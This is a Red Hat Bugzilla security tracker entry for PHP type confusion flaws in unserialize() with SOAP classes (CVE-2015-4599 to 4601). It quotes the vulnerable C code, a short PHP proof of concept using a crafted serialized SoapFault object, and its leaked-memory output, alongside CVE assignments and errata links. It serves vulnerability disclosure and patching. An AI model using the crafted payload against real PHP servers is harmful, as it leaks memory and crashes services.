Bug 1222538 (CVE-2015-4599, CVE-2015-4600, CVE-2015-4601) - CVE-2015-4599 CVE-2015-4600 CVE-2015-4601 php: type confusion issue in unserialize() with various SOAP methods
Summary: CVE-2015-4599 CVE-2015-4600 CVE-2015-4601 php: type confusion issue in unseri...
Alias: CVE-2015-4599, CVE-2015-4600, CVE-2015-4601
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
Depends On: 1228052 1228053 1228070 1228071 1228072 1228073
Blocks: 1213462
TreeView+ depends on / blocked
Reported: 2015-05-18 13:14 UTC by Vasyl Kaigorodov
Modified: 2019-09-29 13:32 UTC (History)
16 users (show)

Fixed In Version: php 5.4.40, php 5.5.24, php 5.6.8
Doc Type: Bug Fix
Doc Text:
Multiple flaws were discovered in the way PHP's Soap extension performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to disclose portion of its memory or crash.
Clone Of:
Last Closed: 2015-07-09 21:36:46 UTC

Attachments (Terms of Use)

System ID Private Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2015:1135 0 normal SHIPPED_LIVE Important: php security and bug fix update 2015-06-23 12:11:40 UTC
Red Hat Product Errata RHSA-2015:1218 0 normal SHIPPED_LIVE Moderate: php security update 2015-07-09 21:01:41 UTC

Description Vasyl Kaigorodov 2015-05-18 13:14:42 UTC
PHP versions 5.4.40, 5.5.24, and 5.6.8 provide a fix for type confusion vulnerability in unserialize() function used on a various SOAP methods.

Copy-paste description of the issue from the upstream bug:
PHP_METHOD(SoapFault, __toString)
  faultcode   = zend_read_property(soap_fault_class_entry, this_ptr, "faultcode", sizeof("faultcode")-1, 1 TSRMLS_CC);
  faultstring = zend_read_property(soap_fault_class_entry, this_ptr, "faultstring", sizeof("faultstring")-1, 1 TSRMLS_CC);
  file = zend_read_property(soap_fault_class_entry, this_ptr, "file", sizeof("file")-1, 1 TSRMLS_CC);
  line = zend_read_property(soap_fault_class_entry, this_ptr, "line", sizeof("line")-1, 1 TSRMLS_CC);
  len = spprintf(&str, 0, "SoapFault exception: [%s] %s in %s:%ld\nStack trace:\n%s",
                 Z_STRVAL_P(faultcode), Z_STRVAL_P(faultstring), Z_STRVAL_P(file), Z_LVAL_P(line),
                 Z_STRLEN_P(trace) ? Z_STRVAL_P(trace) : "#0 {main}\n");


  RETURN_STRINGL(str, len, 0);

The Z_STRVAL_P macro lead to looking up an arbitrary valid memory address, and return a string via a integer-type zval that start from this memory address.
If the memory address is an invalid memory position, it should result in a crash.
The Z_LVAL_P macro lead to leaking memory address via a string-type zval that string value stored.

The following code should leak arbitrary memory or crash PHP:


$data = 'O:9:"SoapFault":4:{s:9:"faultcode";i:4298448493;s:11:"faultstring";i:4298448543;s:7:"'."\0*\0".'file";i:4298447319;s:7:"'."\0*\0".'line";s:4:"ryat";}';
echo unserialize($data);


Result (Test on standard MacOSX 10.10.2 installation of PHP 5.6.6.):

SoapFault exception: [UH??AWAVSPI??I??H????
 in UH??AWAVAUATSH???:4307253992           ] UH??SPD???*?????t"H?
Stack trace:
#0 test.php(4): unserialize('O:9:"SoapFault"...')
#1 {main}

Upstream bug:

Upstream commits:

Comment 6 Tomas Hoger 2015-06-05 15:54:11 UTC
In addition to commits mentioned in comment 0, there is additional commit:


to address the issue mentioned in the following comment of the upstream bug:


Comment 7 Tomas Hoger 2015-06-17 19:34:08 UTC
Multiple CVEs were assigned for the fixes mentioned in the bug, see:

CVE-2015-4599 was assigned for the original SoapFault::__toString issue reported in the upstream bug:


and corrected in:


CVE-2015-4600 was assigned for the SoapClient::__getLastRequest, SoapClient::__getLastResponse, SoapClient::__getLastRequestHeaders, SoapClient::__getLastResponseHeaders, SoapClient::__getCookies, and SoapClient::__setCookie issue described in the following comments of the upstream bug:


and corrected in:


CVE-2015-4601 was assigned for the other fixes applied as part of upstream commit 0c136a2a.

CVE-2015-4602 was assigned for the incomplete class type confusion issue reported in:


and corrected in:


CVE-2015-4603 was assigned for the exception::getTraceAsString() issue reported in:


and corrected in:


Comment 8 Tomas Hoger 2015-06-17 19:41:10 UTC
CVE-2015-4599, CVE-2015-4600, and CVE-2015-4601 issues were already corrected in Red Hat Software Collections updates in 2.0:

php54:  https://rhn.redhat.com/errata/RHSA-2015-1066.html
php55:  https://rhn.redhat.com/errata/RHSA-2015-1053.html

as part of the fixes for CVE-2015-4147 (bug 1204868) / CVE-2015-4148 (bug 1226916).

The rh-php56 collection packages introduced via RHEA-2015:1057 had these issues corrected since the initial release:

rh-php56:  https://rhn.redhat.com/errata/RHEA-2015-1057.html

Comment 9 errata-xmlrpc 2015-06-23 08:13:15 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 7

Via RHSA-2015:1135 https://rhn.redhat.com/errata/RHSA-2015-1135.html

Comment 10 errata-xmlrpc 2015-07-09 17:07:51 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 6

Via RHSA-2015:1218 https://rhn.redhat.com/errata/RHSA-2015-1218.html

Note You need to log in before you can comment on or make changes to this bug.